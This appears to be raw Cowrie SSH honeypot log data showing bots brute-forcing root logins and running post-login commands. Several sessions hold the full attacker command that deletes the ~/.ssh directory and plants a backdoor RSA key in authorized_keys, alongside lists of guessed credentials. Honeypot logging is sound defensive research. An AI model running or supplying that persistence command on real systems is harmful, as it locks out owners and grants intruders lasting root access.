{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:40.839187Z","src_ip":"43.156.132.147","session":"15acbdf67ddb"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T00:35:41.862286Z","src_ip":"43.156.132.147","session":"15acbdf67ddb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:43.109793Z","src_ip":"43.156.132.147","session":"15acbdf67ddb"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":45832,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dd1a744d4bb","protocol":"ssh","message":"New connection: 5.202.105.236:45832 (1.2.3.4:22) [session: 0dd1a744d4bb]","sensor":"my-vps","timestamp":"2025-09-09T00:35:55.264825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:55.295652Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:55.447576Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rD","message":"login attempt [root/P@$$w0rD] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:35:56.042026Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:35:56.371490Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:35:56.372191Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:35:56.373192Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:56.522221Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:35:56.856410Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:35:56.857138Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:35:57.002111Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:35:57.003145Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":46404,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5ca7c9fa457","protocol":"ssh","message":"New connection: 5.202.105.236:46404 (1.2.3.4:22) [session: f5ca7c9fa457]","sensor":"my-vps","timestamp":"2025-09-09T00:35:58.145931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:35:58.152443Z","src_ip":"5.202.105.236","session":"f5ca7c9fa457"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:35:58.300698Z","src_ip":"5.202.105.236","session":"f5ca7c9fa457"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:35:58.879336Z","src_ip":"5.202.105.236","session":"f5ca7c9fa457"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:00.029395Z","src_ip":"5.202.105.236","session":"f5ca7c9fa457"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":47432,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ab4386d17a9","protocol":"ssh","message":"New connection: 5.202.105.236:47432 (1.2.3.4:22) [session: 0ab4386d17a9]","sensor":"my-vps","timestamp":"2025-09-09T00:36:01.147691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:01.153394Z","src_ip":"5.202.105.236","session":"0ab4386d17a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:01.296937Z","src_ip":"5.202.105.236","session":"0ab4386d17a9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:36:01.836351Z","src_ip":"5.202.105.236","session":"0ab4386d17a9"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:01.972182Z","src_ip":"5.202.105.236","session":"0dd1a744d4bb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:01.980954Z","src_ip":"5.202.105.236","session":"0ab4386d17a9"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":52141,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b6f9f44008","protocol":"ssh","message":"New connection: 103.100.209.195:52141 (1.2.3.4:22) [session: 38b6f9f44008]","sensor":"my-vps","timestamp":"2025-09-09T00:36:06.327631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:06.328799Z","src_ip":"103.100.209.195","session":"38b6f9f44008"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:06.529754Z","src_ip":"103.100.209.195","session":"38b6f9f44008"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"qwerty","message":"login attempt [hammer/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:36:07.367811Z","src_ip":"103.100.209.195","session":"38b6f9f44008"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:08.576192Z","src_ip":"103.100.209.195","session":"38b6f9f44008"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":54684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cd9370bcb5f","protocol":"ssh","message":"New connection: 51.250.72.176:54684 (1.2.3.4:22) [session: 5cd9370bcb5f]","sensor":"my-vps","timestamp":"2025-09-09T00:36:24.630060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:24.630710Z","src_ip":"51.250.72.176","session":"5cd9370bcb5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:24.670530Z","src_ip":"51.250.72.176","session":"5cd9370bcb5f"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom2025","message":"login attempt [tom/tom2025] failed","sensor":"my-vps","timestamp":"2025-09-09T00:36:24.868192Z","src_ip":"51.250.72.176","session":"5cd9370bcb5f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":34828,"dst_ip":"1.2.3.4","dst_port":22,"session":"719018f64dcd","protocol":"ssh","message":"New connection: 152.32.129.236:34828 (1.2.3.4:22) [session: 719018f64dcd]","sensor":"my-vps","timestamp":"2025-09-09T00:36:25.788061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:25.788971Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:25.910055Z","src_ip":"51.250.72.176","session":"5cd9370bcb5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:26.050195Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.login.success","username":"root","password":"123ab456","message":"login attempt [root/123ab456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:36:27.122092Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:36:27.657849Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:36:27.658534Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:36:27.659341Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:27.918488Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:36:28.533820Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:36:28.534518Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:36:28.794578Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:28.795578Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":34838,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f7e6080329e","protocol":"ssh","message":"New connection: 152.32.129.236:34838 (1.2.3.4:22) [session: 9f7e6080329e]","sensor":"my-vps","timestamp":"2025-09-09T00:36:29.051165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:29.052056Z","src_ip":"152.32.129.236","session":"9f7e6080329e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlg